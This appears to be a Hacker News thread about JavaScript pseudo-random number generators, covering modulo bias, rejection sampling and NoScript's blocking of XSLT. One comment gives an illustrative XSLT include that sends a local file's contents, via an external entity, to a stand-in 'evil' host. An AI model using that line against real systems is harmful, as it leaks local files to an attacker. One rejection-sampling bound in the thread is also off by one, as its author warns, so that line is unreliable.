

Better random numbers for javascript - acqq
http://baagoe.com/en/RandomMusings/javascript/

======
cscheid
"To obtain an integer in [0, n[, one may simply take the remainder modulo n"

Isn't that the wrong way? IIRC, most PRNGs behave badly in low-order bits. I
always heard that you want to keep the high-order bits around instead via the
appropriate integer division.

~~~
acqq
With a simple LKG you shouldn't do that. There aren't simple LKG's in the
implementations to which that sentence refers.

~~~
tzs
It's still bad in general even if the PRNG is perfect.

For example, suppose r() is a random number generator that generates random
integers in [0, 4294967295]. Suppose I want a random integer in [0,
3000000000]. If I simply take r() % 3000000001, I will get a horrible
distribution. A given integer in [0, ~1300000000] will occur about 50% more
than a given integer in [~1300000000, 3000000000].

Given a perfect uniform random number generator r() generating integers in
[0,M-1], r()%n will only be uniform if n divides M. M%n numbers will be
overrepresented, appearing approximately 1+n/M times as often as they should.

~~~
acqq
Does your claim stay for the r() with the period longer than 2 to 100, the
shortest in the algorithms he presents?

~~~
tzs
Yes. My claim holds even for a true random number generator that has no
period.

It's a pigeon hole problem. If you are trying to put M pigeons in n pigeon
holes, and M is not a multiple of n, you can't put the same number of pigeons
in each hole.

The right way, given r() generates integers in [0,M-1], and you want an
integer in [0,n-1], is to first compare r() to floor(M/n)*(n+1). If r() is
greater or equal to that, discard that value of r() and try again. Once you
have an r below that limit, you can go ahead and it mod n to get your number
in [0,n-1]. (Careful for off by one errors in this...I have not double checked
my work!)

Alternatively, you can reject r() that is less than M%n:

    
    
       while ( (this_r = r()) < M%n )
         ;
       return this_r % n;
    

PS: note that other methods of reducing a range [0,M-1] to [0,n-1] also have
to worry about this. It is not limited to just methods using mod. The only
difference if you ignore the pigeon hole problem is that the different range
reduction methods will differ in how they distribute their bias in the output
range.

~~~
jbaagoe
You are quite right, of course. One should only tolerate such quick and dirty
solutions if M is much bigger than n - but then, that is often the case.

~~~
acqq
I've made a test to get numbers 0..99 from C stdlib random which gives 16-bit
numbers and has a period of 2 to 32 and that was enough to actually see bias
if enough numbers (but much less than a period) are generated. Even for such a
small range. I'd say the problem is very real, not just theoretic.

------
jbaagoe
I have tentatively copied that page to a wiki. The license issues have been
clarified in the process.

Here it is:
[http://baagoe.org/en/wiki/Better_random_numbers_for_javascri...](http://baagoe.org/en/wiki/Better_random_numbers_for_javascript)

------
romaniv
Impressive work, but I really feel the kind of issues the author had to
overcome are also the reasons for avoiding JavaScript in general programming
(which would require quality RNGs).

~~~
trebor
Unless I'm mistaken, he's laying the reason/groundwork for a replacement PRNG
for Javascript/ECMAScript. If one of these algorithms were executed in the
backend it would be quite fast and have none of "javascript slowdowns" for
those calculations.

~~~
acqq
Nobody needs to do "the groundwork" of implementing the existing algorithms in
JS if they would be "in the backend." The reason author did it was to have
different algorithms, with their own good and bad sides, giving the same
repeatable results on the existing platforms implemented in pure JS and with
the common interface.

Additionally he presented his own algorithm inspired by Marsaglia's MWC.

------
valyala
It's a shame ECMAScript standards lack of cryptographically secure random
number generators.

------
Muzza
That site degrades /awfully/ without Javascript.

~~~
mike-cardwell
I see you're a NoScript user. The site looks absolutely fine without
JavaScript enabled. What you're experiencing is one of NoScripts additional
features, in that it also disables XSLT. If you go into NoScripts advanced
options, you'll find a checkbox that you can untick to re-enable XSLT.

I'm not actually sure why NoScript disables XSLT. I'm sure it will be
documented somewhere though.

~~~
infinity
Strange things can sometimes be done with XSLT, for example by using external
entities. An external entity can be a file that stores part of a DTD or
something else. It could be an interesting file on your system, say we call it
something like 'blah'. Then we can send &blah; to our evil server:

<xsl:include href="hxxp://evil.example.com/hello?&blah; />

This is similar to stealing cookies with JavaScript through a cross-site
scripting vulnerability by adding a new image to the page, hotlinked from an
evil server and passing cookie information as a parameter.

~~~
mike-cardwell
I am right in thinking that there aren't any _known_ exploits of this variety
though right? Why is XSLT more dangerous than HTML?

